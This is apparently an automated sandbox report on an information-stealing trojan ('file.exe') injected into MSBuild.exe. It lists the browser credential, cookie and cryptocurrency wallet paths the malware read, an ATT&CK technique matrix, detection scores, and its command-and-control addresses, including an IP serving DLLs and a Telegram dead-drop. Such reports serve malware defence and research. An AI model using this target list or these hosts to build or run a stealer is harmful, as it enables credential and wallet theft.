                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara match File source: Process Memory Space: file.exe PID: 7116, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 6512, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C750C40 sqlite3_bind_zeroblob, 4_2_6C750C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C750D60 sqlite3_bind_parameter_name, 4_2_6C750D60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C678EA0 sqlite3_clear_bindings, 4_2_6C678EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C750B40 sqlite3_bind_value, sqlite3_bind_int64, sqlite3_bind_double, sqlite3_bind_zeroblob, 4_2_6C750B40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C676410 bind, WSAGetLastError, 4_2_6C676410
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 11 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 44 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 51 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 41 Virtualization/Sandbox Evasion | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 511 Process Injection | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        [Figure: Behavior graph. Behavior Graph ID: 1482751, Sample: file.exe, Startdate: 26/07/2024, Architecture: WINDOWS, Score: 100]

                        Source | Detection | Scanner | Label | Link
                        file.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark |
                        file.exe | 24% | Virustotal | | Browse
                        file.exe | 100% | Joe Sandbox ML | |
                        Source | Detection | Scanner | Label | Link
                        C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                        C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                        C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                        C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                        C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                        C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        steamcommunity.com | 0% | Virustotal | | Browse
                        arpdabl.zapto.org | 12% | Virustotal | | Browse
                        fp2e7a.wpc.phicdn.net | 0% | Virustotal | | Browse
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        steamcommunity.com | 23.192.247.89 | true | true | | unknown
                        arpdabl.zapto.org | 77.91.101.71 | true | false | | unknown
                        fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | unknown
                        • URL Reputation: safe
                        unknown
                        https://5.75.212.60/AMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://mozilla.org0/MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://t.me/armad2afile.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/points/shop/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=DAECFI.4.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0file.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/?/MSBuild.exe, 00000004.00000002.2346186542.0000000001688000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp, CBKJJE.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.212.60/softokn3.dllqMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.ecosia.org/newtab/DAECFI.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.212.60/BMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCBGCAF.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/privacy_agreement/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://arpdabl.HJECAAAEBFMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.212MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://arpdabl.zapto.orgMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCBKJJE.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.212.60/oMSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/about/76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/my/wishlist/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFCBGCAF.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://t.me/armad2ahellosqls.dllsqlite3.dllInfile.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.212.60/nss3.dllQMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://help.steampowered.com/en/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/market/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/news/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DAECFI.4.drfalse
                        • URL Reputation: safe
                        unknown
                        http://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17MSBuild.exe, 00000004.00000002.2351862083.0000000019EBC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp, CBKJJE.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199747278259/inventory/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://5.75.212.60/freebl3.dllOMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://arpdabl.zaptoMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/discussions/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://arpdabl.zapto.org/MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/stats/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/steam_refunds/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallCBKJJE.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDAECFI.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&aMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://arpdabl.zapto.AEBFMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/workshop/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/legal/MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContfile.exe, 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.sqlite.org/copyright.html.MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359740327.000000002042D000.00000002.00001000.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvMSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl76561199747278259[1].htm.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgMSBuild.exe, 00000004.00000002.2346186542.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, AAFBAK.4.drfalse
                        • URL Reputation: safe
                        unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoDAECFI.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        5.75.212.60 | unknown | Germany | 24940 | HETZNER-ASDE | false
                        23.192.247.89 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
                        Joe Sandbox version: 40.0.0 Tourmaline
                        Analysis ID: 1482751
                        Start date and time: 2024-07-26 03:16:58 +02:00
                        Joe Sandbox product: CloudBasic
                        Overall analysis duration: 0h 8m 44s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed: 12
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Sample name: file.exe
                        Detection: MAL
                        Classification: mal100.troj.spyw.evad.winEXE@10/24@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
